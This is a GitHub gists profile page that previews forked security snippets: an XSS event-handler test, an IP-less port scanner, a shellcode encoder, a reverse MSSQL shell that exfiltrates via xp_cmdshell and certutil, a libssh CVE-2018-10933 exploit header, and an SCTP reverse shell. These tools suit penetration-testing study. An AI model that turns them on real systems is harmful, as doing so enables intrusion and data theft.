Skip to content

Instantly share code, notes, and snippets.

View ricardojba's full-sized avatar

Ricardo ricardojba

54 followers · 8 following
View GitHub Profile
@ricardojba
ricardojba / html_test.html
Created December 19, 2016 14:26 — forked from rwestergren/html_test.html
HTML Email Filter Test
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o
@ricardojba
ricardojba / crypt.py
Created April 18, 2017 08:14 — forked from fideloper/crypt.py
Decrypt Laravel-encrypted value
import os
import base64
import json
from Crypto.Cipher import AES
from phpserialize import loads
def decrypt(payload):
data = json.loads(base64.b64decode(payload))
@ricardojba
ricardojba / cloudsnare
Created October 4, 2017 13:32 — forked from chokepoint/cloudsnare
Identify IPv4 hosts behind CloudFlare using certificate data
#!/usr/bin/env python3
import censys.certificates
import censys.ipv4
from sys import argv
UID = "**CHANGE**"
SECRET = "**CHANGE**"
def is_cloudflare(dn):
@ricardojba
ricardojba / ipless-scan.py
Created October 30, 2017 17:33 — forked from DiabloHorn/ipless-scan.py
Perform a port scan without having an IP configured on your network interface
#!/usr/bin/env python
# DiabloHorn - https://diablohorn.com
# scan target IP from an interface with no IP configured
# POC - scapy
# pkt = Ether(dst='00:0c:29:f6:a5:65',src='00:08:19:2c:e0:15') / IP(dst='172.16.218.178',src='172.16.218.255') / TCP(dport=445,flags='S')
# sendp(pkt,iface='eth0')
import sys
from scapy.all import *
@ricardojba
ricardojba / ascii-shellcode-encoder.py
Created November 20, 2017 17:26 — forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving
@ricardojba
ricardojba / mandros.py
Created July 4, 2018 09:35 — forked from xassiz/mandros.py
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@ricardojba
ricardojba / php-curl-crlf-injection.mkd
Created August 1, 2018 16:01 — forked from tomnomnom/php-curl-crlf-injection.mkd
CRLF Injection Into PHP's cURL Options

CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.

@ricardojba
ricardojba / CVE-2018-10933-1.py
Last active October 19, 2018 14:53 — forked from mlosapio/CVE-2018-10933-test
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt
# Original exploit code https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7
# References
# https://qxf2.com/blog/ssh-using-python-paramiko/
# https://github.com/SoledaD208/CVE-2018-10933
# On OSX -> pip install paramiko==2.0.8
@ricardojba
ricardojba / sctp_reverse_shell.py
Created December 3, 2018 17:29 — forked from hyperreality/sctp_reverse_shell.py
Simple Python reverse shell using the SCTP protocol
#!/usr/bin/env python3
#
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765
# Connect with `ncat --sctp -lvp 1234`
import os, socket, subprocess
RHOST = '127.0.0.1'
RPORT = 1234
@ricardojba
ricardojba / jira-curl.sh
Created May 14, 2019 08:47 — forked from TheMightyLlama/jira-curl.sh
Perform actions on a jira issue via curl
#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/
#Returns all information for all versions
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/project/AN/versions?
#Returns all issues in a version
#This URL requires the version ID of a single version which is provided by the above query
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/search?jql=project="AN"+AND+fixVersion='12345'